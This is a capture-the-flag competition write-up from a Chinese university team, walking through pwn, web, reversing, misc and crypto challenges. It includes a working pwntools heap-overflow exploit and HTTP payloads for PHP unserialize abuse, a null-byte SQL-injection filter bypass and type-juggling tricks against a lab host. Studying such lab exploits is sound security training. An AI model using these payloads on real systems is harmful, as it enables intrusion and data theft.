"Black Shield Cup" (黑盾杯): Fuzhou University's SIOR team wins the Special Prize. A brief walkthrough of the key challenges.
PWN
magicheap
The program contains a `cat flag` call.
It is reached through the hidden menu option 4869: when the global `magic` is greater than 0x1305, the program reads the flag.
So the goal is to make `magic` > 0x1305.
The vulnerability is in the edit function: when editing a note, the size is entirely under our control, but the size of the chunk was fixed when it was created, so the edit size gives us a heap overflow.
The `stdin` pointer sits just above `magic` and is a 0x7fXXXXXXXX address, so 0x6020ad can be treated as a fake chunk.
By overwriting the fd of a freed fastbin chunk, a 0x70-sized chunk is allocated at that fake location.
If the challenge had not provided this `magic` variable, and no libc, getting a shell would not have been nearly this easy.
from pwn import *

context.log_level = 'debug'
#p = process('./magicheap')
p = remote('192.168.200.200', 40001)

def new(size, content):
    p.recvuntil('Your choice :')
    p.sendline('1')
    p.recvuntil('Heap : ')
    p.sendline(str(size))
    p.recvuntil('heap:')
    p.sendline(content)

def edit(idx, size, content):
    p.recvuntil('Your choice :')
    p.sendline('2')
    p.recvuntil('Index :')
    p.sendline(str(idx))
    p.recvuntil('Heap : ')
    p.sendline(str(size))
    p.recvuntil('heap : ')
    p.sendline(content)

def free(idx):
    p.recvuntil('Your choice :')
    p.sendline('3')
    p.recvuntil('Index :')
    p.sendline(str(idx))

# six 0x70 chunks, then free two of them into the 0x70 fastbin
new(0x60, 'a'*0x5f)
new(0x60, 'a'*0x5f)
new(0x60, 'a'*0x5f)
new(0x60, 'a'*0x5f)
new(0x60, 'a'*0x5f)
new(0x60, 'a'*0x5f)
free(1)
free(2)
# overflow out of chunk 0: rewrite the headers of the two freed chunks and
# point the fastbin fd at the fake chunk at 0x6020ad
edit(0, 0x200, 'a'*0x60 + p64(0) + p64(0x71) + 'a'*0x60 + p64(0) + p64(0x71) + p64(0x6020ad))
# the second allocation returns the fake chunk, overwriting magic
new(0x60, 'a'*0x5f)
new(0x60, 'a'*0x5f)
#gdb.attach(p)
p.interactive()
Windows reversing
A simple read-and-compare.
Roughly: your input is `input`, the program has a built-in byte array `byte_415768` and a built-in array `v9`.
For the first 17 positions, input[i] = byte_415768[v9[i]]; the last few characters are just ` 1024}`.
I wrote the extraction quickly and did not notice the 17 at the time; v9 has 22 entries, so I extracted all 22 and appended ` 1024}`, until a teammate pointed it out.
WEB
theuserisadmin
Source code
<!--
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
    echo "hello admin!<br>";
    include($file); //class.php
}else{
    echo "you are not admin ! ";
}
-->
Read the files through a PHP stream wrapper (php:// pseudo-protocol).
index.php

<?php
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
    echo "hello admin!<br>";
    if(preg_match("/f1a9/",$file)){
        exit();
    }else{
        include($file); //class.php
        $pass = unserialize($pass);
        echo $pass;
    }
}else{
    echo "you are not admin ! ";
}
?>
<!--
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
    echo "hello admin!<br>";
    include($file); //class.php
}else{
    echo "you are not admin ! ";
}
-->

class.php

<?php
class Read{//f1a9.php
    public $file;
    // echo $pass on an unserialized Read object calls this magic method
    public function __toString(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
        }
        return "__toString was called!";
    }
}
?>
Final payload

POST /web/theuserisadmin/?user=php://input&file=class.php&pass=O%3A4%3A%22Read%22%3A1%3A%7Bs%3A4%3A%22file%22%3Bs%3A8%3A%22f1a9.php%22%3B%7D HTTP/1.1
Host: 192.168.200.200
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

the user is admin
waf
A quick file scan turns up www.zip; on to code audit.

function.php

function filtering($str) {
    $check = eregi('select|insert|update|delete|\'|/\*|\*|\.\./|\./|union|into|load_file|outfile', $str);
    if($check) {
        echo "非法字元!";   // "illegal character!"
        exit();
    }
    .....
}
eregi is bypassed with %00 (a null byte terminates the string it inspects).
content.php concatenates the parameter straight into the query.
<?php
include './global.php';
extract($_REQUEST);
$sql = "select * from test.content where id=$message_id";

payload

POST /web/waf/content.php HTTP/1.1
Host: 192.168.200.200
Connection: close
Content-Type: multipart/form-data; boundary=--------2049511993
Content-Length: 138

----------2049511993
Content-Disposition: form-data; name="message_id"

"%00" union select 1,2,flag,4 from flag
----------2049511993--
codeaudit
.svn leak

<?php
error_reporting(0);
$user = $_COOKIE['user'];
$code = $_GET['code']?(int)$_GET['code']:'';
if($user == 'admin' && !empty($code)) {
    $hex = (int)$code;
    if(($hex ^ 6789) === 0xCDEF) {
        require("flag.php");
        echo $flag;
        exit();
    }
}
echo "ȱ��Ӧ�еIJ���,��û��Ȩ�鿴������";   // Chinese message, garbled in the extracted page
?>
Very simple: code = 0xCDEF ^ 6789 = 55146.
payload

GET /web/codeaudit/?code=55146 HTTP/1.1
Host: 192.168.200.200
Cookie: user=admin
Connection: close
best language
The source is shown directly.

<?php
show_source(__FILE__);
$a=0; $b=0; $c=0; $d=0;
if (isset($_GET['x1'])) {
    $x1 = $_GET['x1'];
    $x1=="1"?die("ha?"):NULL;
    switch ($x1) {
        case 0:
        case 1:
            $a=1;
            break;
    }
}
$x2=(array)json_decode(@$_GET['x2']);
if(is_array($x2)){
    is_numeric(@$x2["x21"])?die("ha?"):NULL;
    if(@$x2["x21"]){
        ($x2["x21"]>2017)?$b=1:NULL;
    }
    if(is_array(@$x2["x22"])){
        if(count($x2["x22"])!==2 OR !is_array($x2["x22"][0])) die("ha?");
        $p = array_search("XIPU", $x2["x22"]);
        $p===false?die("ha?"):NULL;
        foreach($x2["x22"] as $key=>$val){
            $val==="XIPU"?die("ha?"):NULL;
        }
        $c=1;
    }
}
$x3 = $_GET['x3'];
if ($x3 != '15562') {
    if (strstr($x3, 'XIPU')) {
        if (substr(md5($x3),8,16) == substr(md5('15562'),8,16)) {
            $d=1;
        }
    }
}
if($a && $b && $c && $d){
    include "flag.php";
    echo $flag;
}
?>
PHP weak typing, plus the loose comparison inside array_search.
The md5 part:

$ php -r "echo substr(md5('15562'),8,16);"
0e46379442318098

A string of the form 0e followed by digits is a numeric string, and PHP's loose numeric comparison evaluates it to 0.
So it is enough to find another md5 whose same 16-character slice has that format.
import hashlib
import re

i = 0
# characters 8..23 of the hex digest must look like 0e + 14 digits
reg = re.compile('.{8}0e[0-9]{14}.{8}')
while True:
    s = 'XIPU' + str(i)
    md5 = hashlib.md5()
    md5.update(s.encode('ascii'))
    if reg.match(md5.hexdigest()):
        print(md5.hexdigest(), s)
        break
    i = i + 1
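An added example, not from the team's write-up, that models in Python why the x3 check passes: PHP's loose `==` compares two numeric strings as numbers, so a `0e...` slice equals any other `0e...` slice, while a type-strict comparison does not. The helper names (`md5_slice`, `weak_check`, `strict_check`) are assumptions of this example; it also covers other numeric forms such as `1e3 == 1000` that the page's regex does not search for.

```python
import hashlib
import hmac
import re

# PHP numeric string (PHP 5/7 semantics, no trailing garbage):
# optional sign, digits[.digits] or .digits, optional exponent.
_NUMERIC = re.compile(r'^[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$')


def is_php_numeric(s: str) -> bool:
    return _NUMERIC.match(s) is not None


def php_loose_eq(a: str, b: str) -> bool:
    """Model of `$a == $b` for two PHP strings: numeric strings are compared
    as numbers, anything else byte for byte."""
    if is_php_numeric(a) and is_php_numeric(b):
        return float(a) == float(b)
    return a == b


def md5_slice(s: str) -> str:
    """PHP's substr(md5($s), 8, 16)."""
    return hashlib.md5(s.encode('ascii')).hexdigest()[8:24]


def weak_check(x3: str, target: str = '15562') -> bool:
    """The challenge's check as written (loose ==)."""
    return (x3 != target and 'XIPU' in x3
            and php_loose_eq(md5_slice(x3), md5_slice(target)))


def strict_check(x3: str, target: str = '15562') -> bool:
    """The same check with a constant-time, type-strict comparison: only a
    genuine collision on those 16 hex characters could satisfy it."""
    return (x3 != target and 'XIPU' in x3
            and hmac.compare_digest(md5_slice(x3), md5_slice(target)))


if __name__ == '__main__':
    print(php_loose_eq('0e46379442318098', '0e99999999999999'))  # True
    print(strict_check('XIPU18570'))                              # False
```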
payload

GET /web/bestlanguage/?x1=true&x2={"x21":"2018a","x22":[[],true]}&x3=XIPU18570 HTTP/1.1
Host: 192.168.200.200
Connection: close
MISC
reverseMe
Opening the file shows

swodniW( 6SC pohsotohP ebodA

# read as bytes so the reversed data can be written back as a binary file
with open('reverseMe.txt', 'rb') as f:
    data = f.read()
with open('output.png', 'wb') as f:
    f.write(data[::-1])

which gives the image.
Traffic audit
Keyword: theflag, brute-forced with a binary search.
Patiently going through the entries one by one is enough.
52c6f1d6
crypto
brightstar
snkeegt fhstetr Iedsabs tnaktrt otessha iiriwis tethees
key: howarey
Columnar Transposition Cipher
Hint: Columnar Transposition Cipher
The key is the same as in the ctf-wiki example, so we decoded it by hand.
Itisofteninthedarkestskipsthatweseebrighteststars
What is this?
Open it and base32-decode it.

>>> import base64
>>> base64.b32decode('MZWGCZ33MM4GENJVHBRDSNJUGAYTSOBVGZTDAYRQGIZTINLEMMZTSNJVHBRX2===')
b'flag{c8b558b954019856f0b02345dc39558c}'
Note: this write-up was provided by the Special Prize-winning Fuzhou University SIOR team (advisor: He Xiaoling).
More challenge analyses will follow in our later reports.